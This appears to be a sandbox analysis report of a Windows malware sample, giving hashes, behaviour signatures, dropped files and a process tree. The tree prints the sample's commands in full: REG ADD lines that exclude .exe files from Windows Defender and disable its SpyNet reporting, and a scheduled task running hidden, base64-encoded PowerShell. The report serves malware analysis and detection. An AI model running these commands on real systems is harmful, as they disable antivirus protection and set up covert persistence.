Overview

overview

7

Static

static

3

a96b67d92b...68.exe

windows7-x64

7

a96b67d92b...68.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    45s
  • max time network
    51s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 18:39

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    a96b67d92b927feb54f4b3d37de9af76d4ce3b7dd20df4bb71567b69e2001368.exe

  • Size

    7.1MB

  • MD5

    c5d41d92dac11a02d31cc73c5f450fa5

  • SHA1

    1ccfbcfed98a69236315a81ade528010f239aacd

  • SHA256

    a96b67d92b927feb54f4b3d37de9af76d4ce3b7dd20df4bb71567b69e2001368

  • SHA512

    68cae2440957167228c5f8dac47d023c759815ce8bc2c74ef040c36b269eb649208fe881eb1951a8e0ee4d9e6fd6888a5af041fc25d92ebf8b01544502758f72

  • SSDEEP

    196608:91OZQLfJmGyixZoq44KHssGn4EhL+HBYLb6Ggq:3OZQLjswWGn4KLOeWq

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a96b67d92b927feb54f4b3d37de9af76d4ce3b7dd20df4bb71567b69e2001368.exe
    "C:\Users\Admin\AppData\Local\Temp\a96b67d92b927feb54f4b3d37de9af76d4ce3b7dd20df4bb71567b69e2001368.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Users\Admin\AppData\Local\Temp\7zSF27E.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Users\Admin\AppData\Local\Temp\7zSF397.tmp\Install.exe
        .\Install.exe /TdidYrkHJ "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3336
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2536
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1264
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:5080
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:2208
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2896
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3692
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3564
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:1232
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "ggahGGYnt" /SC once /ST 05:13:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:2448
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "ggahGGYnt"
                  4⤵
                    PID:2932
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1796

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\7zSF27E.tmp\Install.exe
                    Filesize

                    6.1MB

                    MD5

                    b2620b3a381d36388cf5b38d5e722d05

                    SHA1

                    7ca8ef74670c548e041471d9bb871bff8f102728

                    SHA256

                    152e1d5b4020ec7b43f4210951c1997c230dea6228d11cddbca770e8ba282181

                    SHA512

                    fc43f57088d30285b4eb5a5e0f0eab7eab3d014216752155f9c1047f7469ac077d44b14395dc856dd859d2ac04959b992329bf2623b2b7bd15edbcffce82da6f

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7zSF27E.tmp\Install.exe
                    Filesize

                    6.1MB

                    MD5

                    b2620b3a381d36388cf5b38d5e722d05

                    SHA1

                    7ca8ef74670c548e041471d9bb871bff8f102728

                    SHA256

                    152e1d5b4020ec7b43f4210951c1997c230dea6228d11cddbca770e8ba282181

                    SHA512

                    fc43f57088d30285b4eb5a5e0f0eab7eab3d014216752155f9c1047f7469ac077d44b14395dc856dd859d2ac04959b992329bf2623b2b7bd15edbcffce82da6f

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\7zSF397.tmp\Install.exe
                    Filesize

                    6.9MB

                    MD5

                    f157b91bc4743550585335cb3529d97d

                    SHA1

                    df26bf67224b5bf4198d96c86f20a34cd9d0fcd9

                    SHA256

                    58cce2b86981492a2fded2f3d29a2eb23e9d3b88723974ac06be345fd8148dc9

                    SHA512

                    15cf948fffcd1861d65c714b6df00b53d3553993d39cac060d6329d4f6ea14c7dc032c8e83c8dfea2a238ce9f9954f4f5c99fe1672c757f7c430616ae36292dc

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpad0jsc.b4y.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • memory/1796-16-0x00007FFE42410000-0x00007FFE42ED1000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/1796-17-0x000002D662B10000-0x000002D662B20000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/1796-18-0x000002D662B10000-0x000002D662B20000-memory.dmp

                    Filesize

                    64KB

                    Download

                  • memory/1796-28-0x000002D662C20000-0x000002D662C42000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/3336-11-0x0000000000910000-0x0000000000FF6000-memory.dmp

                    Filesize

                    6.9MB

                    Download

                  • memory/3336-12-0x0000000010000000-0x000000001058A000-memory.dmp

                    Filesize

                    5.5MB

                    Download